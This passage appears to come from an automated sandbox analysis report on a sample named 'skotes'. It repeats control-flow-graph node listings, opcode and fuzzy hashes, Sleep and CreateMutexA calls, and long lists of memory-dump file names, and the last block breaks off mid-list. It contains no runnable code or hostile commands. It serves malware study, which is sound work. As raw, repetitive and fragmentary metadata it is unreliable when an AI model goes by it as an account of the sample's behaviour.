                                                                                                                                                                • Opcode ID: ae24a17fb9ddc21d8967a9edba00150ff008881fe9803f080a2e4377e602fb6d
                                                                                                                                                                • Instruction ID: 8d445855e308f7813b80df79a2fb355bf6cc309bcabf649930d8eb28f8f79489
                                                                                                                                                                • Opcode Fuzzy Hash: ae24a17fb9ddc21d8967a9edba00150ff008881fe9803f080a2e4377e602fb6d
                                                                                                                                                                • Instruction Fuzzy Hash: F0310C316041409BFF18BB78DCC97ADB7E2EBC6314F248299E054973E5DBB59980C752

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 164 b8a54d-b8a56d 168 b8a59b-b8a5b7 164->168 169 b8a56f-b8a57b 164->169 170 b8a5b9-b8a5c5 168->170 171 b8a5e5-b8a604 168->171 172 b8a57d-b8a58b 169->172 173 b8a591-b8a598 call b9d663 169->173 176 b8a5db-b8a5e2 call b9d663 170->176 177 b8a5c7-b8a5d5 170->177 178 b8a632-b8a916 call b980c0 171->178 179 b8a606-b8a612 171->179 172->173 174 b8a944-b8a994 call bb6c6a * 3 Sleep CreateMutexA 172->174 173->168 198 b8a996-b8a998 174->198 199 b8a9a7-b8a9a8 174->199 176->171 177->174 177->176 184 b8a628-b8a62f call b9d663 179->184 185 b8a614-b8a622 179->185 184->178 185->174 185->184 198->199 200 b8a99a-b8a9a5 198->200 200->199
                                                                                                                                                                APIs
                                                                                                                                                                • Sleep.KERNELBASE(00000064), ref: 00B8A963
                                                                                                                                                                • CreateMutexA.KERNELBASE(00000000,00000000,00BE3254), ref: 00B8A981
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.2211661900.0000000000B81000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                                                                • Associated: 00000002.00000002.2211642134.0000000000B80000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2211661900.0000000000BE2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2211726487.0000000000BE9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2211745385.0000000000BEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2211766707.0000000000BF7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2211882784.0000000000D4E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2211908376.0000000000D50000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2211935873.0000000000D62000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2211935873.0000000000D70000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2211984440.0000000000D73000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212007165.0000000000D74000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212027388.0000000000D75000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212053040.0000000000D76000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212075033.0000000000D77000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212095083.0000000000D79000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212115749.0000000000D88000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212138577.0000000000D89000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212161657.0000000000D9F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212180221.0000000000DA1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212199603.0000000000DA3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212223956.0000000000DB2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212244847.0000000000DBF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212268954.0000000000DC0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212291358.0000000000DC9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212321805.0000000000DCD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212339734.0000000000DD5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212359612.0000000000DDE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212381992.0000000000DEE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212404685.0000000000DEF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212433729.0000000000DF6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212455415.0000000000DFB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212476561.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212499490.0000000000E06000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212524826.0000000000E0E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212560156.0000000000E12000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212583740.0000000000E1F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212604897.0000000000E20000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212630026.0000000000E2D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212648989.0000000000E2E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212648989.0000000000E4D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212709439.0000000000E64000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212732275.0000000000E65000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212760073.0000000000E7B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212785203.0000000000E7C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212807860.0000000000E83000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212829136.0000000000E85000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212857506.0000000000E93000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212879557.0000000000E94000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_b80000_skotes.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CreateMutexSleep
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1464230837-0
                                                                                                                                                                • Opcode ID: 3f02d1cb27c197f9d991411fb9368278b833ac200b3f91d2218e5a742702d5cc
                                                                                                                                                                • Instruction ID: 404304540677420ffa11ca267c6602fde4edb3e45acfdd3c340d0cd108873a87
                                                                                                                                                                • Opcode Fuzzy Hash: 3f02d1cb27c197f9d991411fb9368278b833ac200b3f91d2218e5a742702d5cc
                                                                                                                                                                • Instruction Fuzzy Hash: E7314C31A041009BFB08EB78DCC97ADB7E2EBC6314F24829AE054DB3E5CB759981C752

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 202 b8a682-b8a6a2 206 b8a6d0-b8a6ec 202->206 207 b8a6a4-b8a6b0 202->207 210 b8a71a-b8a739 206->210 211 b8a6ee-b8a6fa 206->211 208 b8a6b2-b8a6c0 207->208 209 b8a6c6-b8a6cd call b9d663 207->209 208->209 214 b8a949-b8a994 call bb6c6a * 2 Sleep CreateMutexA 208->214 209->206 212 b8a73b-b8a747 210->212 213 b8a767-b8a916 call b980c0 210->213 216 b8a6fc-b8a70a 211->216 217 b8a710-b8a717 call b9d663 211->217 218 b8a749-b8a757 212->218 219 b8a75d-b8a764 call b9d663 212->219 234 b8a996-b8a998 214->234 235 b8a9a7-b8a9a8 214->235 216->214 216->217 217->210 218->214 218->219 219->213 234->235 236 b8a99a-b8a9a5 234->236 236->235
                                                                                                                                                                APIs
                                                                                                                                                                • Sleep.KERNELBASE(00000064), ref: 00B8A963
                                                                                                                                                                • CreateMutexA.KERNELBASE(00000000,00000000,00BE3254), ref: 00B8A981
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.2211661900.0000000000B81000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                                                                • Associated: 00000002.00000002.2211642134.0000000000B80000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2211661900.0000000000BE2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2211726487.0000000000BE9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2211745385.0000000000BEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2211766707.0000000000BF7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2211882784.0000000000D4E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2211908376.0000000000D50000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2211935873.0000000000D62000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2211935873.0000000000D70000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2211984440.0000000000D73000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212007165.0000000000D74000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212027388.0000000000D75000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212053040.0000000000D76000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212075033.0000000000D77000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212095083.0000000000D79000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212115749.0000000000D88000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212138577.0000000000D89000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212161657.0000000000D9F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212180221.0000000000DA1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212199603.0000000000DA3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212223956.0000000000DB2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212244847.0000000000DBF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212268954.0000000000DC0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212291358.0000000000DC9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212321805.0000000000DCD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212339734.0000000000DD5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212359612.0000000000DDE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212381992.0000000000DEE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212404685.0000000000DEF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212433729.0000000000DF6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212455415.0000000000DFB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212476561.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212499490.0000000000E06000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212524826.0000000000E0E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212560156.0000000000E12000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212583740.0000000000E1F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212604897.0000000000E20000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212630026.0000000000E2D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212648989.0000000000E2E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212648989.0000000000E4D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212709439.0000000000E64000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212732275.0000000000E65000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212760073.0000000000E7B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212785203.0000000000E7C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212807860.0000000000E83000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212829136.0000000000E85000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212857506.0000000000E93000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212879557.0000000000E94000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_b80000_skotes.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CreateMutexSleep
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1464230837-0
                                                                                                                                                                • Opcode ID: b472561b780129a95a6be62dc59fdc9a2a0fbbad3bc643d6c2f19e15e5bc7938
                                                                                                                                                                • Instruction ID: 50e1f4dcf9b0548543a90c98ca11c8dec4331d81fa5a046ed8131cf471f799d3
                                                                                                                                                                • Opcode Fuzzy Hash: b472561b780129a95a6be62dc59fdc9a2a0fbbad3bc643d6c2f19e15e5bc7938
                                                                                                                                                                • Instruction Fuzzy Hash: CB312A316042049BFB08EB78DCC97ADBBE2EB86314F24869AE054D73E5DB759980C752

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 238 b89adc-b89ae8 239 b89aea-b89af8 238->239 240 b89afe-b89b27 call b9d663 238->240 239->240 241 b8a917 239->241 248 b89b29-b89b35 240->248 249 b89b55-b89b57 240->249 243 b8a953-b8a994 Sleep CreateMutexA 241->243 244 b8a917 call bb6c6a 241->244 252 b8a996-b8a998 243->252 253 b8a9a7-b8a9a8 243->253 244->243 254 b89b4b-b89b52 call b9d663 248->254 255 b89b37-b89b45 248->255 250 b89b59-b8a916 call b980c0 249->250 251 b89b65-b89d91 call b97a00 call b85c10 call b88b30 call b98220 call b97a00 call b85c10 call b88b30 call b98220 249->251 252->253 259 b8a99a-b8a9a5 252->259 254->249 255->241 255->254 259->253
                                                                                                                                                                APIs
                                                                                                                                                                • Sleep.KERNELBASE(00000064), ref: 00B8A963
                                                                                                                                                                • CreateMutexA.KERNELBASE(00000000,00000000,00BE3254), ref: 00B8A981
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.2211661900.0000000000B81000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                                                                • Associated: 00000002.00000002.2211642134.0000000000B80000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2211661900.0000000000BE2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2211726487.0000000000BE9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2211745385.0000000000BEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2211766707.0000000000BF7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2211882784.0000000000D4E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2211908376.0000000000D50000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2211935873.0000000000D62000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2211935873.0000000000D70000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2211984440.0000000000D73000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212007165.0000000000D74000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212027388.0000000000D75000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212053040.0000000000D76000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212075033.0000000000D77000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212095083.0000000000D79000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212115749.0000000000D88000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212138577.0000000000D89000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212161657.0000000000D9F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212180221.0000000000DA1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212199603.0000000000DA3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212223956.0000000000DB2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212244847.0000000000DBF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212268954.0000000000DC0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212291358.0000000000DC9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212321805.0000000000DCD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212339734.0000000000DD5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212359612.0000000000DDE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212381992.0000000000DEE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212404685.0000000000DEF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212433729.0000000000DF6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212455415.0000000000DFB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212476561.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212499490.0000000000E06000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212524826.0000000000E0E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212560156.0000000000E12000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212583740.0000000000E1F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212604897.0000000000E20000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212630026.0000000000E2D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212648989.0000000000E2E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212648989.0000000000E4D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212709439.0000000000E64000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212732275.0000000000E65000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212760073.0000000000E7B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212785203.0000000000E7C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212807860.0000000000E83000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212829136.0000000000E85000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212857506.0000000000E93000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212879557.0000000000E94000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_2_2_b80000_skotes.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CreateMutexSleep
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1464230837-0
                                                                                                                                                                • Opcode ID: 0561be7b038ad8ffda9a44fbcc643a968b45bfb3cbf8cb36d70d1922ee768677
                                                                                                                                                                • Instruction ID: 960c1d17416ff4f16ef4c08d2d9fd567638b7b129d94a61468ba2a246b507159
                                                                                                                                                                • Opcode Fuzzy Hash: 0561be7b038ad8ffda9a44fbcc643a968b45bfb3cbf8cb36d70d1922ee768677
                                                                                                                                                                • Instruction Fuzzy Hash: B0213D316042009BFF18AB68ECC576DB7E2EBC1314F1442A9E444C72E1DB759941C751

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 315 b8a856-b8a86e 316 b8a89c-b8a89e 315->316 317 b8a870-b8a87c 315->317 320 b8a8a9-b8a8b1 call b87d30 316->320 321 b8a8a0-b8a8a7 316->321 318 b8a87e-b8a88c 317->318 319 b8a892-b8a899 call b9d663 317->319 318->319 322 b8a94e-b8a987 call bb6c6a Sleep CreateMutexA 318->322 319->316 331 b8a8b3-b8a8bb call b87d30 320->331 332 b8a8e4-b8a8e6 320->332 324 b8a8eb-b8a916 call b980c0 321->324 335 b8a98e-b8a994 322->335 331->332 339 b8a8bd-b8a8c5 call b87d30 331->339 332->324 337 b8a996-b8a998 335->337 338 b8a9a7-b8a9a8 335->338 337->338 340 b8a99a-b8a9a5 337->340 339->332 343 b8a8c7-b8a8cf call b87d30 339->343 340->338 343->332 347 b8a8d1-b8a8d9 call b87d30 343->347 347->332 350 b8a8db-b8a8e2 347->350 350->324
                                                                                                                                                                APIs
                                                                                                                                                                • Sleep.KERNELBASE(00000064), ref: 00B8A963
                                                                                                                                                                • CreateMutexA.KERNELBASE(00000000,00000000,00BE3254), ref: 00B8A981
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000002.00000002.2211661900.0000000000B81000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B80000, based on PE: true
                                                                                                                                                                • Associated: 00000002.00000002.2211642134.0000000000B80000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2211661900.0000000000BE2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2211726487.0000000000BE9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2211745385.0000000000BEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2211766707.0000000000BF7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2211882784.0000000000D4E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2211908376.0000000000D50000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2211935873.0000000000D62000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2211935873.0000000000D70000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2211984440.0000000000D73000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212007165.0000000000D74000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212027388.0000000000D75000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212053040.0000000000D76000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212075033.0000000000D77000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212095083.0000000000D79000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212115749.0000000000D88000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212138577.0000000000D89000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212161657.0000000000D9F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212180221.0000000000DA1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212199603.0000000000DA3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212223956.0000000000DB2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212244847.0000000000DBF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212268954.0000000000DC0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212291358.0000000000DC9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212321805.0000000000DCD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212339734.0000000000DD5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212359612.0000000000DDE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212381992.0000000000DEE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                • Associated: 00000002.00000002.2212404685.0000000000DEF000.00000040.00000001.01000000.00000007.sdmpDownload File
